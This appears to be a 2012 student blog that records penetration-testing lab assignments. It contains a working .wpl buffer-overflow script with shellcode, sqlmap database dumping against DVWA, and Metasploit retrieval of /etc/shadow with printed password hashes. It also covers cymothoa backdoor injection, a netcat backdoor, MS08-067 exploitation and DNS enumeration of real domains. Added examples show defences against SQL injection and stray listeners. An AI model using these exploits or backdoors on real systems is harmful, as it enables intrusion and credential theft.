Friday, 17 February 2012

OK, this is my last try. I tried to exploit using the *.wpl extension, and here is the result.
1. The first picture shows that EIP is filled with the A character.
2. This picture shows that I was able to fill EIP with DEADBEEF. I got this after filling the stack with 43500 characters of junk.
3. I used shlwapi to find the JMP ESP instruction.
4. And here is my script:
jnk="\x43" * (43500);
#jnk+="\xEF\xBE\xAD\xDE"
jnk+="\x27\xB2\xFA\x77"
#jnk+="\x41"*16
jnk+="\x90"*32

jnk+=("\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f"
"\x20\xd3\x4e\x83\xeb\xfc\xe2\xf4\xc3\xc8\x97\x4e\x3f\x20\x58\x0b"
"\x03\xab\xaf\x4b\x47\x21\x3c\xc5\x70\x38\x58\x11\x1f\x21\x38\x07"
"\xb4\x14\x58\x4f\xd1\x11\x13\xd7\x93\xa4\x13\x3a\x38\xe1\x19\x43"
"\x3e\xe2\x38\xba\x04\x74\xf7\x4a\x4a\xc5\x58\x11\x1b\x21\x38\x28"
"\xb4\x2c\x98\xc5\x60\x3c\xd2\xa5\xb4\x3c\x58\x4f\xd4\xa9\x8f\x6a"
"\x3b\xe3\xe2\x8e\x5b\xab\x93\x7e\xba\xe0\xab\x42\xb4\x60\xdf\xc5"
"\x4f\x3c\x7e\xc5\x57\x28\x38\x47\xb4\xa0\x63\x4e\x3f\x20\x58\x26"
"\x03\x7f\xe2\xb8\x5f\x76\x5a\xb6\xbc\xe0\xa8\x1e\x57\x5e\x0b\xac"
"\x4c\x48\x4b\xb0\xb5\x2e\x84\xb1\xd8\x43\xb2\x22\x5c\x0e\xb6\x36"
"\x5a\x20\xd3\x4e")

ex = jnk
file=open("try.wpl","w")
file.write(ex)
file.close()
# the JMP ESP address is at 77FAB227; reversed it becomes "\x27\xB2\xFA\x77". Found in shlwapi.dll

Friday, 10 February 2012

warFTP

As I write this I have influenza. Finally, I must say that I failed at it. I successfully installed War FTP, but I failed to configure it so that it can connect with my BackTrack. OK, let's see my trouble.
First I want to show that the connection is all fine; this can be seen from the ping result.
Next I will show the warFTP config.
From the picture above we know that warFTP is properly set...
But my problem came when I started to connect using nc.
I tried to make the exploit, and I read the book many times, but I still do not understand and still have too many questions; maybe it is because I really don't know Python. I need help... and my physical condition is not too good. Sorry, I tried hard.

how to use sqlmap

what is sqlmap
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
how to use it
The first thing we must do before using this tool is make sure that the web application has an SQL injection (SQLi) vulnerability. For example, take http://192.168.0.21/data/get_int.php?id=1: when we put a single quote at the end of the address and see an error, it means that we can use sqlmap. In class we learned that DVWA has an SQLi vulnerability, so we just type the command below:
root@bt:/pentest/database/sqlmap# ./sqlmap.py  -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit" --cookie="security=low; Xplico=6pkfig990001f3sqqmmjcr5im7; PHPSESSID=ao6gfq0ou4bafia7vphn6qfvl0" --dbs
The command above produces information about the databases on the server.
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 21:53:15
[21:53:15] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[21:53:15] [INFO] testing connection to the target url
[21:53:15] [INFO] heuristics detected web page charset 'ascii'
[21:53:16] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests
[21:53:16] [INFO] testing if the url is stable, wait a few seconds
[21:53:17] [INFO] url is stable
[21:53:17] [INFO] testing if GET parameter 'id' is dynamic
[21:53:17] [INFO] confirming that GET parameter 'id' is dynamic
[21:53:17] [INFO] GET parameter 'id' is dynamic
[21:53:17] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[21:53:17] [INFO] testing sql injection on GET parameter 'id'
[21:53:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:53:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[21:53:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:53:17] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[21:53:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[21:53:24] [INFO] target url appears to be UNION injectable with 2 columns
[21:53:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
[21:53:28] [INFO] testing if GET parameter 'Submit' is dynamic
[21:53:28] [WARNING] GET parameter 'Submit' appears to be not dynamic
[21:53:28] [INFO] heuristic test shows that GET parameter 'Submit' might be injectable (possible DBMS: MySQL)
[21:53:28] [INFO] testing sql injection on GET parameter 'Submit'
[21:53:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:53:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[21:53:29] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:53:29] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[21:53:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[21:53:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:53:30] [WARNING] GET parameter 'Submit' is not injectable
sqlmap identified the following injection points with a total of 149 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=' UNION ALL SELECT NULL, CONCAT(CHAR(58,116,101,121,58),CHAR(84,105,69,117,65,89,80,116,111,103),CHAR(58,99,116,99,58))# &Submit=Submit
---
[21:53:30] [INFO] manual usage of GET payloads requires url encoding
[21:53:30] [INFO] testing MySQL
[21:53:30] [INFO] confirming MySQL
[21:53:30] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL >= 5.0.0
[21:53:30] [INFO] fetching database names
available databases [4]:
[*] dvwa
[*] fbip
[*] information_schema
[*] mysql
[21:53:30] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 21:53:30


We see at the end the databases available on the server: there are 4 databases. What about dumping a database? To dump a database we type a command like the one below:
root@bt:/pentest/database/sqlmap# ./sqlmap.py  -u "http://localhost/dvwa/vulnerabilities/sqli/?id='&Submit=Submit" --cookie="security=low; Xplico=6pkfig990001f3sqqmmjcr5im7; PHPSESSID=ao6gfq0ou4bafia7vphn6qfvl0" -D mysql  --dump
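Why the single-quote test and the UNION query reported by sqlmap work, and what the fix looks like, shown as an added example that is not part of the original post. It uses SQLite in place of MySQL; the table layout, sample rows and function names are assumptions made for illustration.

```python
import sqlite3

# Constructed sample data; the table layout is an assumption for illustration.
ROWS = [
    (1, "admin", "admin", "hash-of-admin-password"),
    (2, "Gordon", "Brown", "hash-of-gordon-password"),
]

# Constructed input with the same UNION shape as the payload sqlmap reported.
UNION_INPUT = "' UNION ALL SELECT first_name, password FROM users -- "


def make_db():
    """Create an in-memory database holding the sample users table."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT,"
        " last_name TEXT, password TEXT)"
    )
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", ROWS)
    return db


def lookup_concatenated(db, user_id):
    """Vulnerable pattern: the request parameter becomes part of the SQL text."""
    query = (
        "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    )
    return db.execute(query).fetchall()


def lookup_parameterized(db, user_id):
    """Hardened pattern: the SQL text is fixed and the value is bound as data."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(query, (user_id,)).fetchall()


def lookup_validated(db, user_id):
    """Defense in depth: reject anything that is not a plain integer id."""
    if not user_id.isdigit():
        raise ValueError("id must be numeric")
    return lookup_parameterized(db, int(user_id))


def quote_breaks_query(lookup, db):
    """Return True when a lone single quote causes a SQL syntax error."""
    try:
        lookup(db, "'")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("quote breaks concatenated:", quote_breaks_query(lookup_concatenated, db))
    print("quote breaks parameterized:", quote_breaks_query(lookup_parameterized, db))
    print("concatenated + UNION input:", lookup_concatenated(db, UNION_INPUT))
    print("parameterized + UNION input:", lookup_parameterized(db, UNION_INPUT))
```

With the bound parameter, the same input is compared as a plain string against user_id, so no row matches and the password column is never reached.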

Thursday, 09 February 2012

privilege escalation

The basic rule that we must follow in hacking is:

  1. Information Gathering
  2. Service Enumeration
  3. Vulnerability Assessment
  4. Exploit
On Saturday, 04 February 2012 we had an assignment to do a privilege escalation on the computer 192.168.0.21. The most important thing is that we only had 10 minutes.
The first step is information gathering. Use nmap to gather information about which services are running on the target.
root@bt:~# nmap -sV 192.168.0.21
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-04 18:06 WIT
Nmap scan report for 192.168.0.21
Host is up (0.0016s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.51 seconds
From the text above we notice something different on port 10000, with the clue Webmin httpd. From that information we go directly to Metasploit to look for a module that we may be able to use.
msf > search webmin
Matching Modules
================
   Name                                    Disclosure Date  Rank    Description
   ----                                    ---------------  ----    -----------
   auxiliary/admin/webmin/file_disclosure  2006-06-30       normal  Webmin file disclosure
msf > use auxiliary/admin/webmin/file_disclosure 
msf  auxiliary(file_disclosure) > set rhost 192.168.0.21
rhost => 192.168.0.21
msf  auxiliary(file_disclosure) > exploit
[*] Attempting to retrieve /etc/passwd...
[*] The server returned: 200 Document follows
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
[*] Auxiliary module execution completed
msf  auxiliary(file_disclosure) > ls
[*] exec: ls

0bf3a6a5724cf0b0499ca7e73ac252ae.rtf
404606_2784683289646_1035152752_32311634_134946266_n.jpg
builder32-2
c16547b957eb2413ec509c66343cd7cb.rtf
Desktop
ed3691697b313fbb1bdf495b7fb1c9a3.rtf
meterpreter.pdf
VirtualBox VMs
Oops... something is wrong. Why does the password not appear?? OK, let's see the options by typing show options
msf  auxiliary(file_disclosure) > show options

Module options (auxiliary/admin/webmin/file_disclosure):

   Name     Current Setting   Required  Description
   ----     ---------------   --------  -----------
   DIR      /unauthenticated  yes       Webmin directory path
   Proxies                    no        Use a proxy chain
   RHOST    192.168.0.21      yes       The target address
   RPATH    /etc/passwd       yes       The file to download
   RPORT    10000             yes       The target port
   VHOST                      no        HTTP server virtual host

msf  auxiliary(file_disclosure) > set rpath /etc/shadow/
rpath => /etc/shadow/
msf  auxiliary(file_disclosure) > exploit

[*] Attempting to retrieve /etc/shadow/...
[*] The server returned: 200 Document follows
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
[*] Auxiliary module execution completed
msf  auxiliary(file_disclosure) > ls
[*] exec: ls

0bf3a6a5724cf0b0499ca7e73ac252ae.rtf
404606_2784683289646_1035152752_32311634_134946266_n.jpg
builder32-2
c16547b957eb2413ec509c66343cd7cb.rtf
Desktop
ed3691697b313fbb1bdf495b7fb1c9a3.rtf
meterpreter.pdf
VirtualBox VMs
Bingo, we get the list of passwords and the user names obama, root, etc. ... that's all done.
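The shadow file retrieved above stores every password with the $1$ prefix, which is MD5-crypt. A small audit that an administrator could run over a shadow-format file to find accounts still on a weak scheme follows; it is an added example, not part of the original post, and the sample lines and hash strings in it are constructed placeholders.

```python
# Constructed shadow-format lines; the hash strings are placeholders, not real hashes.
SAMPLE_SHADOW = """\
root:$1$saltsalt$PLACEHOLDERHASHAAAAAAAAAAA:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
alice:$6$saltsalt$PLACEHOLDERHASHBBBBBBBBBBB:19000:0:99999:7:::
bob:$1$saltsalt$PLACEHOLDERHASHCCCCCCCCCCC:14041:0:99999:7:::
carol::19000:0:99999:7:::
"""

# crypt(3) scheme identifiers found between the first two '$' characters.
SCHEMES = {
    "1": "md5crypt",
    "2a": "bcrypt",
    "2b": "bcrypt",
    "2y": "bcrypt",
    "5": "sha256crypt",
    "6": "sha512crypt",
    "y": "yescrypt",
}

# Schemes that should trigger a password reset under a stronger scheme.
WEAK = {"md5crypt", "des-or-unknown", "empty"}


def classify(password_field):
    """Map the second field of a shadow line to a scheme name."""
    if password_field == "":
        return "empty"  # no password required at all
    if password_field[0] in "*!":
        return "locked"  # password login disabled
    parts = password_field.split("$")
    if password_field.startswith("$") and len(parts) >= 3:
        return SCHEMES.get(parts[1], "des-or-unknown")
    return "des-or-unknown"  # traditional DES crypt has no '$' prefix


def audit(shadow_text):
    """Return (user, scheme) for every account stored with a weak scheme."""
    findings = []
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) < 2 or not fields[0]:
            continue  # skip blank or malformed lines
        scheme = classify(fields[1])
        if scheme in WEAK:
            findings.append((fields[0], scheme))
    return findings


if __name__ == "__main__":
    for user, scheme in audit(SAMPLE_SHADOW):
        print("%-8s %s" % (user, scheme))
```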
 

how to use cymothoa

In the post before this one I explained cymothoa, so it is time to write about how to use it. Actually, when we type cymothoa there is a lot of help on how to use it. First type
>cymothoa -S
The command above shows the list of injections that we can use.
To inject a process we need the process ID (PID). To get the PID just type
>ps -ax
That command produces the list of processes running on the system.



After we know the PID we can begin the injection by typing
 >cymothoa -p 1140 -s 0 -y 9000
The command above means that we use shell number 0 and inject the process with PID 1140, on port 9000.

We see that the infection is done. When we check the processes, there will be two processes with the same name.
To make sure that our injection is done we can scan using nmap.
We see that port 9000 is open, with the service name listener.
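The new listener on port 9000 is also the easiest thing for a defender to catch on the host itself. The check below parses /proc/net/tcp and reports listening ports that are not in a known baseline; it is an added example, not part of the original post. The sample table, the baseline set and the function names are constructed, and the address decoding assumes a little-endian host such as x86.

```python
import socket
import struct

# Constructed /proc/net/tcp content: sshd on 22, MySQL on loopback 3306,
# one established SSH session, and an unexpected listener on 9000 (0x2328).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 5120 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   103        0 6231 1 0000000000000000 100 0 0 10 0
   2: 812BA8C0:0016 012BA8C0:C350 01 00000000:00000000 02:000A1B2C 00000000     0        0 7782 2 0000000000000000 20 4 30 10 -1
   3: 00000000:2328 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 9913 1 0000000000000000 100 0 0 10 0
"""

TCP_LISTEN = "0A"  # socket state code for LISTEN in /proc/net/tcp

# Assumed baseline of ports this host is expected to listen on.
BASELINE_PORTS = {22, 3306}


def decode_endpoint(hex_endpoint):
    """Turn 'AABBCCDD:PPPP' into (dotted IP, port); assumes little-endian host."""
    addr_hex, port_hex = hex_endpoint.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(addr_hex, 16)))
    return ip, int(port_hex, 16)


def parse_listeners(proc_net_tcp_text):
    """Return one dict per socket in LISTEN state; the header line is skipped."""
    listeners = []
    for line in proc_net_tcp_text.splitlines():
        fields = line.split()
        if len(fields) < 10 or fields[3] != TCP_LISTEN:
            continue  # header, malformed line, or non-listening socket
        ip, port = decode_endpoint(fields[1])
        listeners.append({
            "ip": ip,
            "port": port,
            "uid": int(fields[7]),
            "inode": int(fields[9]),
            "exposed": not ip.startswith("127."),  # reachable from the network
        })
    return listeners


def unexpected_listeners(listeners, baseline_ports):
    """Keep only listeners whose port is missing from the baseline."""
    return [entry for entry in listeners if entry["port"] not in baseline_ports]


def scan_live(baseline_ports, path="/proc/net/tcp"):
    """Run the same check against the running Linux host."""
    with open(path) as handle:
        return unexpected_listeners(parse_listeners(handle.read()), baseline_ports)


if __name__ == "__main__":
    found = unexpected_listeners(parse_listeners(SAMPLE_PROC_NET_TCP), BASELINE_PORTS)
    for entry in found:
        print("unexpected listener %(ip)s:%(port)d uid=%(uid)d inode=%(inode)d" % entry)
```

The inode in each finding can be matched against the socket links under /proc/<pid>/fd to identify which process owns the listener.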

Wednesday, 08 February 2012

how to backdoor using nc

The next assignment is about NC (netcat), not (net cut)... First, what is nc?
Netcat is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable “back-end” device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities.
Actually this is a useful tool that can listen on a port, etc.
By default it is included in Linux, but when we practiced in class we found that nc did not exist on the system. So what is the solution? The solution is to copy the nc.traditional binary from bt5 and then put the binary in the /bin/ directory.
After nc is properly copied into the Ubuntu system we can try to execute nc with the command

root@ubuntu-VirtualBox:/bin# ./nc.traditional -l -p 9000
The meaning of the command above is to execute nc and listen on port 9000. On our host, use nc with the command
nc 192.168.43.129 9000
To verify that our connection is established, we can type anything in the console, and everything that we type will show up on the other side. To be clearer, see the illustration below:

From the picture above we can see that anything we type shows up on the other host (the guest). The picture shows that we are connected using nc. Once we are connected, the next step is to send cymothoa to the guest. How do we do that? But before we do that, maybe we are confused about what cymothoa is.
Cymothoa is a stealth backdooring tool, that inject backdoor’s shellcode into an existing process. The tool uses the ptrace library (available on nearly all * nix), to manipulate processes and infect them.
Back to the main point: for the next step, to send cymothoa to the Ubuntu system we can use a command like the one below:
nc 192.168.43.129 9000 < cymothoa
Important note: before we execute the command above we must make sure that we are in the cymothoa directory /pentest/backdoors/cymotho/. On the client side (Ubuntu) we must type
>cymothoa
If it is done well, a file named cymothoa is created in the current path. Just give it permission 777, and then to test that the file works type the command below
./cymothoa
If everything goes fine it will look like the picture below.

Thursday, 02 February 2012

Exploit The XP SP3


Of the assignments that I got, I think this is the most difficult: exploit Win XP SP3. I didn't have any idea how I must start. In class the assistant did not explain what to do. He only said to use Nessus to gather information and catch something vulnerable, and then use exploitdb.

OK, straight to the point... To start Nessus: as we know, Nessus runs on port 8834, so just type https://localhost:8834 in the address bar, wait a while, and log in using the username and password that we entered before.
After we enter the right username and password we will enter the Nessus page, like the picture below.
In the picture above, choose Scans so that we can make a new scan project, and press the Add button.
Enter the name of our project, the type, etc., just like the picture below, and click Launch Scan.
After we press Launch Scan, the scan will begin; wait until the process is done.
See that the scan got six high results that we can exploit. To see the details just double-click on it. And if we want to see the details, just click and Nessus will tell us the details.
If we click, it will show details like the picture below.
Using Nessus is done. It's time to use Metasploit or exploit db. Honestly, until now I have too many questions about how to use the exploit?? How.. how.. and how....?? I tried to ask Google for some help but I did not get the right answer.

OMG, Alhamdulillahirabbil'alamin (praise be to God)... thank God, masha'Allah, at last I understand how to use it... hmm... it is now 21:11 on 02 February 2012... I know... I know... I know...

After going round and round (puter-puter) and searching and searching, at last I understand. OK, without too much talk we go directly to the case. We found MS09-001; just search for it in Metasploit.

Eh... before doing that we must first enter Metasploit by typing msfconsole
and we will enter the Metasploit console, and then type search ms09-001. Remember that ms09-001 is the clue that we got from the Nessus scan. OK, without too much talk, just see the detail in the picture below.
Based on the picture above we know that some exploits were found. Now... this is the big question that I have finally cracked. How to use this exploit?????? It's simple, just type
use auxiliary/dos/windows/smb/ms09_001_write
The next step is to set the rhost by typing rhost 192.168.43.128. Remember that our target is 192.168.43.128, and press enter. The next step is to type exploit.
Bingo, and what is the result?? The result is that the Win XP SP3 in VirtualBox restarts. It is difficult to prove it in the blog, but the picture below can represent it.


I want to try another bug. We found six bugs, right :D :D :D The next bug is MS08_067


Oh my god, I found something new in it.. I found meterpreter and I don't know what I must do with it.
Whoooooooooohohohohohohoho.... What have I found??

I tried to use the ls command and I got all the directories in Windows. Nice, it is very nice..... Thanks to God...

That is all my experience tonight... this is not the end but this is the beginning. It is my first experience and will be my best experience. I'll never forget how happy I am... I always say Alhamdulillahirabbil'alamin... praise be to my Lord Allah SWT, Lord of all the worlds...








Tuesday, 31 January 2012

information gathering for is2c-dojo and spentera

In this case I use dnsenum as my tool. To use dnsenum, simply type

root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl is2c-dojo.com

That script produces information about is2c-dojo.com, and the result is:


root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl is2c-dojo.com
dnsenum.pl VERSION:1.2.2

-----   is2c-dojo.com   -----


Host's addresses:
__________________

is2c-dojo.com                            13419    IN    A        67.222.154.106


Name Servers:
______________

ns2.partnerit.us                         9826     IN    A        67.222.154.107
ns1.partnerit.us                         9826     IN    A        67.222.154.106


Mail (MX) Servers:
___________________

                                                                                                                                                        
                                                                                                                                                        
Trying Zone Transfers and getting Bind Versions:                                                                                                        
_________________________________________________                                                                                                       
                                                                                                                                                        
                                                                                                                                                        
Trying Zone Transfer for is2c-dojo.com on ns2.partnerit.us ...
AXFR record query failed: NOERROR

ns2.partnerit.us Bind Version: #9.3.6-P1-RedHat-9.3.6-16.P1.el5_7.1

Trying Zone Transfer for is2c-dojo.com on ns1.partnerit.us ...
AXFR record query failed: NOERROR

ns1.partnerit.us Bind Version: #9.3.6-P1-RedHat-9.3.6-16.P1.el5_7.1

brute force file not specified, bay.
root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl is2c-dojo.com -w
dnsenum.pl VERSION:1.2.2
Warning: can't load Net::Whois::IP module, whois queries disabled.

-----   is2c-dojo.com   -----                                                                                                                           
                                                                                                                                                        
                                                                                                                                                        
Host's addresses:                                                                                                                                       
__________________                                                                                                                                      
                                                                                                                                                        
is2c-dojo.com                            13392    IN    A        67.222.154.106                                                                         

                                                                                                                                                        
Name Servers:                                                                                                                                           
______________                                                                                                                                          
                                                                                                                                                        
ns1.partnerit.us                         9789     IN    A        67.222.154.106                                                                         

                                                                                                                                                        
Mail (MX) Servers:                                                                                                                                      
___________________                                                                                                                                     
                                                                                                                                                        
aspmx.l.google.com                       92       IN    A        74.125.65.27                                                                           

                                                                                                                                                        
Trying Zone Transfers and getting Bind Versions:                                                                                                        
_________________________________________________                                                                                                       
                                                                                                                                                        
                                                                                                                                                        
Trying Zone Transfer for is2c-dojo.com on ns2.partnerit.us ...
AXFR record query failed: NOERROR

ns2.partnerit.us Bind Version: #9.3.6-P1-RedHat-9.3.6-16.P1.el5_7.1

Trying Zone Transfer for is2c-dojo.com on ns1.partnerit.us ...
AXFR record query failed: NOERROR

ns1.partnerit.us Bind Version: #9.3.6-P1-RedHat-9.3.6-16.P1.el5_7.1

brute force file not specified, bay.
And the information that I get from the domain www.is2c-dojo.net is:
root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl is2c-dojo.net -w                                                                                                                     
dnsenum.pl VERSION:1.2.2
Warning: can't load Net::Whois::IP module, whois queries disabled.

-----   is2c-dojo.net   -----                                                                                                                                                                  
                                                                                                                                                                                               
                                                                                                                                                                                               
Host's addresses:                                                                                                                                                                              
__________________                                                                                                                                                                             
                                                                                                                                                                                               
is2c-dojo.net                            28800    IN    A        216.239.38.21                                                                                                                 
is2c-dojo.net                            28800    IN    A        216.239.32.21
is2c-dojo.net                            28800    IN    A        216.239.34.21
is2c-dojo.net                            28800    IN    A        216.239.36.21

                                                                                                                                                                                               
Name Servers:                                                                                                                                                                                  
______________                                                                                                                                                                                 
                                                                                                                                                                                               
partnerit1.earth.orderbox-dns.com        158355   IN    A        67.15.47.189                                                                                                                  
partnerit1.earth.orderbox-dns.com        158355   IN    A        67.15.253.220
partnerit1.earth.orderbox-dns.com        158355   IN    A        67.15.47.188
partnerit1.earth.orderbox-dns.com        158355   IN    A        67.15.253.219
partnerit1.mercury.orderbox-dns.com      158355   IN    A        50.23.136.174
partnerit1.mercury.orderbox-dns.com      158355   IN    A        50.23.136.229
partnerit1.mercury.orderbox-dns.com      158355   IN    A        50.23.136.230
partnerit1.mercury.orderbox-dns.com      158355   IN    A        50.23.136.173
partnerit1.mars.orderbox-dns.com         158355   IN    A        184.173.149.221
partnerit1.mars.orderbox-dns.com         158355   IN    A        184.173.150.57
partnerit1.mars.orderbox-dns.com         158355   IN    A        184.173.150.58
partnerit1.mars.orderbox-dns.com         158355   IN    A        184.173.149.222
partnerit1.venus.orderbox-dns.com        158354   IN    A        50.23.75.45
partnerit1.venus.orderbox-dns.com        158354   IN    A        50.23.75.96
partnerit1.venus.orderbox-dns.com        158354   IN    A        50.23.75.44
partnerit1.venus.orderbox-dns.com        158354   IN    A        50.23.75.97

                                                                                                                                                                                               
Mail (MX) Servers:                                                                                                                                                                             
___________________                                                                                                                                                                            
                                                                                                                                                                                               
                                                                                                                                                                                               
                                                                                                                                                                                               
Trying Zone Transfers and getting Bind Versions:                                                                                                                                               
_________________________________________________                                                                                                                                              
                                                                                                                                                                                               
                                                                                                                                                                                               
Trying Zone Transfer for is2c-dojo.net on partnerit1.earth.orderbox-dns.com ...
AXFR record query failed: query timed out
Unable to obtain Server Version for partnerit1.earth.orderbox-dns.com : query timed out

Trying Zone Transfer for is2c-dojo.net on partnerit1.mercury.orderbox-dns.com ...
AXFR record query failed: NOERROR

partnerit1.mercury.orderbox-dns.com Bind Version: LServed by POWERDNS 3.0 $Id: packethandler.cc 2231 2011-07-11 07:25:27Z ahu $

Trying Zone Transfer for is2c-dojo.net on partnerit1.mars.orderbox-dns.com ...
AXFR record query failed: NOERROR

partnerit1.mars.orderbox-dns.com Bind Version: LServed by POWERDNS 3.0 $Id: packethandler.cc 2231 2011-07-11 07:25:27Z ahu $

Trying Zone Transfer for is2c-dojo.net on partnerit1.venus.orderbox-dns.com ...
AXFR record query failed: NOERROR

partnerit1.venus.orderbox-dns.com Bind Version: LServed by POWERDNS 3.0 $Id: packethandler.cc 2231 2011-07-11 07:25:27Z ahu $

brute force file not specified, bay.
The information that I get from the domain www.spentera.com is:
root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl spentera.com
dnsenum.pl VERSION:1.2.2

-----   spentera.com   -----                                                                                                                                                                   
                                                                                                                                                                                               
                                                                                                                                                                                               
Host's addresses:                                                                                                                                                                              
__________________                                                                                                                                                                             
